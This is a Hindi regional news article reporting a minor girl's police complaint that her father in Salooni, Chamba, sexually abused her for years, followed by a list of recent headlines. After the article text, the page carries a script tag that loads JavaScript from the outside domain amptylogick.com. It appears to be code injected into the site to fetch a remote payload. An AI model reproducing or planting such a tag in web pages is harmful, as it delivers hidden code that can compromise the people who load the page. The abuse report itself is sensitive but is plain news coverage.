चंबाः सलूणी में पिता ने किया बेटी से दुराचार

<p>चंबा के गांव सलूणी में पिता का अपनी ही बेटी से दुराचार का मामला सामने आया है। नबालिग ने पुलिस में शिकायत दर्ज़ करवाई है कि उसका पिता कई सालो से उसके साथ दुराचार कर रहा था। पुलिस ने आरोपी के खिलाफ मामला दर्ज़ कर लिया है। नबालिग का मेडिकल करवाया जा रहा है।</p>

<p>जानकारी के अनुसार सलूणी के किहरा थाना के तहत आते एक गांव की नबालिग ने पुलिस में शिकायत दी है कि वह अपने भाई- बहनों में सबसे बड़ी है। जब वह 14 साल की थी तो घर पर कोई नहीं था। तब उसके पिता ने उसे कमरे में ले जाकर उसके साथ दुराचार किया और धमकी भी दी कि इस बारे में किसी को बताया तो जान से मार देगा। पीड़िता ने शिकायत में कहा कि इसके बाद से सिलसिला लगातार चलता रहा एक दिन जब उसके घर कोई नहीं था। तो मौका पाकर फिर पिता ने उसके साथ दुराचार किया। पिता के इस कुकृत्य से तंग आकर वह घर से भाग गई और चंबा पहुंच गई। जहा उसे एक महिला ने पुलिस तक पहुंचाया।</p>

<p>डीएसपी सलूणी राम करन राणा ने कहा कि किहर थाना के तहत एक गांव में नबालिग ने अपने पिता के खिलाफ दुराचार करने की रिपोर्ट दर्ज़ करवाई थी। पीड़िता की दी हुई शिकायत के अधार पर पुलिस ने आरोपित बाप पर मामला दर्ज़ कर लिया है।</p>
<script src=”//amptylogick.com/21aca573d498d25317.js”></script>

Samachar First

Recent Posts

बंगलूरू के ताज होटल को बम से उड़ाने की धमकी, मुंबई में आतंकी हमले का अलर्ट

  Karnatka, Agencies: कर्नाटक की राजधानी बंगलूरू के ताज वेस्ट एंड होटल को बम से…

1 hour ago

IIT Mandi में 12वां दीक्षांत समारोह, शाश्वत गुप्ता को राष्ट्रपति पदक

Mandi : आईआईटी मंडी में शनिवार को 12वें दीक्षांत समारोह का आयोजन किया गया। समारोह…

2 hours ago

कुलगाम में आतंकवादियों से मुठभेड़, चार सुरक्षाकर्मी और एक यातायात अधिकारी घायल

कुलगाम में आतंकवादियों से हुई मुठभेड़ में चार सुरक्षाकर्मी व एक यातायात पुलिस अधिकारी घायल…

2 hours ago

नही थम रहा मस्जिद विवाद, देवभूमि संघर्ष समिति की फ‍िर हुंकार, प्रदेश भर में प्रदर्शन

  Shimla:कथित अवैध मस्जिदों और मजारों के निर्माण पर रोक की मांग को लेकर देवभूमि…

3 hours ago

हिमाचल विश्वविद्यालय में हादसा: हॉस्टल की 5वीं मंजिल से गिरकर छात्र की मौत

  Shimla: शुक्रवार देर रात हिमाचल प्रदेश विश्वविद्यालय में एसबीएस हॉस्टल में छात्र के गिरने…

3 hours ago

बड़ा प्रशासनिक फेरबदल: 12 एसडीएम समेत 29 एचएस अधिकारियों के तबादले

  Shimla: हिमाचल में बड़ा प्रशासनिक फेरबदल हुआ है।  कांग्रेस की सुक्‍खू  सरकार ने 12…

3 hours ago